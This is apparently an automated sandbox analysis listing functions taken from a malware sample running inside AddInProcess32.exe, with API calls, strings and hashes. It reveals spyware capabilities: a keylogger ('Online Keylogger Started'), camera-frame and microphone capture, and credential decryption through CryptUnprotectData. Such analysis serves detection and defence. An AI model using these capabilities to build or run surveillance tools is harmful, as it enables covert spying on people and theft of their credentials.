Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF

Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9

Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4

Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC

Strings

CloseCamera, xrefs: 0040456E
GetFrame, xrefs: 0040457F
OpenCamera, xrefs: 00404562
FreeFrame, xrefs: 00404590

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
Opcode Fuzzy Hash: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E

Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

_free.LIBCMT ref: 00442318
_free.LIBCMT ref: 0044232F
_free.LIBCMT ref: 0044234E
_free.LIBCMT ref: 00442369
_free.LIBCMT ref: 00442380

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
Opcode Fuzzy Hash: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48

Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
_free.LIBCMT ref: 004468EC

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00446AB8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E

Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044136B
_free.LIBCMT ref: 0044138B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84

Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
__alloca_probe_16.LIBCMT ref: 0044E391
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
__freea.LIBCMT ref: 0044E3FD

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
Opcode Fuzzy Hash: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98

Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
waveInStart.WINMM ref: 00401CDE

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
Opcode Fuzzy Hash: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E

Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044C543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
_free.LIBCMT ref: 0044C59F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
Opcode Fuzzy Hash: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8

Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
int.LIBCPMT ref: 0040FBE8

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040FC28
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8

Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
_free.LIBCMT ref: 004457E3
_free.LIBCMT ref: 0044580A
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DBB4

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044DBC6
_free.LIBCMT ref: 0044DBD8
_free.LIBCMT ref: 0044DBEA
_free.LIBCMT ref: 0044DBFC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C

Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441566

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00441578
_free.LIBCMT ref: 0044158B
_free.LIBCMT ref: 0044159C
_free.LIBCMT ref: 004415AD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E

Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C

Strings

[regsplt], xrefs: 00412608

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
Opcode Fuzzy Hash: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8

Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044B918
_free.LIBCMT ref: 0044BA35

Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE

Strings

*?, xrefs: 0044B90C
., xrefs: 0044BBEC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94

Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00442C15
__freea.LIBCMT ref: 00442C9B

Strings

H"GH"G, xrefs: 00442B5D
H"G, xrefs: 00442B40, 00442B60, 00442B89, 00442C65, 00442C83

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: H"G$H"GH"G
API String ID: 1635606685-3036711414
Opcode ID: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
Opcode Fuzzy Hash: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E

Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040189E
ExitThread.KERNEL32 ref: 004018D6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

Strings

8:G, xrefs: 00401868

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: 8:G
API String ID: 1649129571-405301104
Opcode ID: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
Opcode Fuzzy Hash: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E

Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00440975
_free.LIBCMT ref: 00440A40
_free.LIBCMT ref: 00440A4A

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 0044096C, 00440973, 004409A2, 004409DA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
API String ID: 2506810119-760905667
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59

Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

_wcslen.LIBCMT ref: 00419744

Strings

program files (x86)\, xrefs: 0041973E
program files\, xrefs: 0041972A, 00419731, 00419743
.exe, xrefs: 00419696

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$program files (x86)\$program files\
API String ID: 37874593-1203593143
Opcode ID: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
Opcode Fuzzy Hash: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9

Function 0040A0B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
wsprintfW.USER32 ref: 0040A13F

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

], xrefs: 0040A0CC
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A0C7

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
Opcode Fuzzy Hash: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9

Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF

Strings

Online Keylogger Started, xrefs: 00409E4C, 00409E55, 00409E7F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
Opcode Fuzzy Hash: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE

Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
GetProcAddress.KERNEL32(00000000), ref: 00406097

Strings

crypt32, xrefs: 0040608B
CryptUnprotectData, xrefs: 00406086

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794

Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
CloseHandle.KERNEL32(?), ref: 004051AA
SetEvent.KERNEL32(?), ref: 004051B9

Strings

Connection Timeout, xrefs: 00405178

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49

Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E

Strings

ios_base::failbit set, xrefs: 0040D240
